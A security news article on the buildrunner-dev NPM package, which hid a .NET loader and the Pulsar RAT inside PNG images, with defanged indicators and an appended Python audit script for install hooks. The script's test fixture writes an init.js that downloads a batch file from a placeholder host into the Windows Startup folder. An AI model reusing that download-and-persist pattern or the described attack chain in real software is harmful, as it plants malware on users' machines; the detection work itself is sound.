Researchers have discovered that a malicious NPM package called buildrunner-dev uses steganography to evade antivirus software and install a Remote Access Trojan on Windows systems by concealing .NET malware inside innocent-looking PNG images. This campaign, found in February 2026, represents a significant change in supply chain attack techniques, since the malicious code is entirely hidden inside what looks to be an ordinary image file. The package copied the legitimate buildrunner and build-runner NPM packages, both of which had long since been abandoned by their maintainers.
This malicious version could be mistaken for an updated release or maintained fork by a developer looking for the original package.
A file named init.js was automatically triggered by the postinstall hook after it was installed using npm install. This file silently downloaded a batch file called packageloader.bat from a Codeberg repository. In order to ensure that it would launch automatically on each subsequent login, the file then copied itself into the Windows Startup folder.
Only after removing seven layers of obfuscation from the batch file—which was 1,653 lines long but contained only about 21 lines of actual working instructions—were Veracode analysts able to uncover the entire attack chain. The rest was artificial noise: sporadic word comments, fictitious base64 strings, and junk variables created purely to trick human reviewers and static analysis tools.
Using the fodhelper.exe UAC bypass technique (MITRE ATT&CK T1548.002), the malware silently elevated itself without any visible prompt before triggering its payload.
package.json of the malicious package (Source: Veracode)
After that, it used conhost.exe to start a hidden PowerShell session, checked the system for installed antivirus software, and, depending on the outcome, followed a different infection path. The last payload was the well-known open-source Remote Access Trojan Pulsar, which was loaded via process hollowing into a genuine Windows process.
Hiding in Simple Pixels
The hidden malware was present in two PNG files hosted on ImgBB: "6b8owksyv28w.png" (41×41 px, 2.3 KB) contained a 4,903-byte AMSI bypass PowerShell script, and "0zt4quciwxs2.png" (141×141 px, 67 KB) contained a compressed 136 KB .NET loader.
The hidden malware was present in two PNG files hosted on ImgBB (Source: Veracode).
These payloads appear to any scanner as random visual noise because the malware encoded them directly into each image's RGB pixel values. The final encrypted Pulsar RAT payload was delivered on demand via a third steganographic PNG located at hxxps://i.ibb[.]co/tpyTL2Zg/s9rugowxbq8i.png, which served as the live C2 channel.
Indicators of compromise (Indicator: Type)
buildrunner-dev: Malicious NPM Package
hxxps://i.ibb[.]co/tpyTL2Zg/s9rugowxbq8i.png: C2 Steganographic Image URL
packageloader.bat: Dropped Batch File
%AppData%\protect.bat: Persistence File
JJYDJO.exe: Dropped Executable
Security teams should disable automatic postinstall script execution, audit NPM packages prior to installation, and keep a close eye out for odd PowerShell behavior. Similar attacks can be discovered before significant harm is done by watching for UAC bypass registry modifications and unexpected outbound connections to free image hosting services.
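As an added example (not Veracode's analysis code and not anything from the package), the following Python audit implements the pre-install check recommended above: it lists every lifecycle hook in a package's package.json and, when a hook merely runs a local JavaScript file, scans that file for the behaviours the article describes (remote fetch, shell execution, .bat/PowerShell references, Startup-folder persistence). The package.json and init.js it scans are constructed stand-ins; the URL and file names in them are placeholders, not the real indicators.

```python
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Strings that warrant a human look; a hit is a reason to read the file, not a verdict.
INDICATORS = {
    "remote_fetch": re.compile(r"https?://|\bfetch\(|require\(['\"]https?['\"]\)"),
    "shell_exec": re.compile(r"child_process|\bexec(Sync)?\(|\bspawn(Sync)?\("),
    "batch_or_powershell": re.compile(r"\.bat\b|\.cmd\b|powershell", re.IGNORECASE),
    "startup_persistence": re.compile(r"Startup", re.IGNORECASE),
}

def audit_package(pkg_dir):
    """One finding per lifecycle hook in package.json; when the hook simply runs a
    local .js file, that file is scanned and the matching indicator names listed."""
    pkg_dir = os.path.abspath(pkg_dir)
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        finding = {"hook": hook, "command": cmd, "indicators": []}
        m = re.fullmatch(r"\s*node\s+([\w./-]+\.js)\s*", cmd)
        if m:
            path = os.path.abspath(os.path.join(pkg_dir, m.group(1)))
            if path.startswith(pkg_dir + os.sep) and os.path.isfile(path):  # stay inside pkg
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                finding["indicators"] = [n for n, rx in INDICATORS.items() if rx.search(src)]
        findings.append(finding)
    return findings

def build_sample_package():
    """Constructed package mirroring the reported shape: a postinstall hook running
    init.js, which fetches a .bat and writes it under the Startup folder. The URL
    and file names are placeholders, not the real indicators."""
    d = tempfile.mkdtemp(prefix="npm-audit-")
    with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "example-pkg", "scripts": {"postinstall": "node init.js"}}, fh)
    with open(os.path.join(d, "init.js"), "w", encoding="utf-8") as fh:
        fh.write('const https = require("https"), cp = require("child_process");\n'
                 'const dst = process.env.APPDATA + "/Microsoft/Windows/Start Menu/Programs/Startup/loader.bat";\n'
                 'https.get("https://example.invalid/loader.bat", r => r.pipe(require("fs").createWriteStream(dst)));\n')
    return d
```

Run `audit_package` against an unpacked tarball (`npm pack <name>`, then extract) before installing, or alongside `npm config set ignore-scripts true`, so that no hook executes before a human has seen the findings.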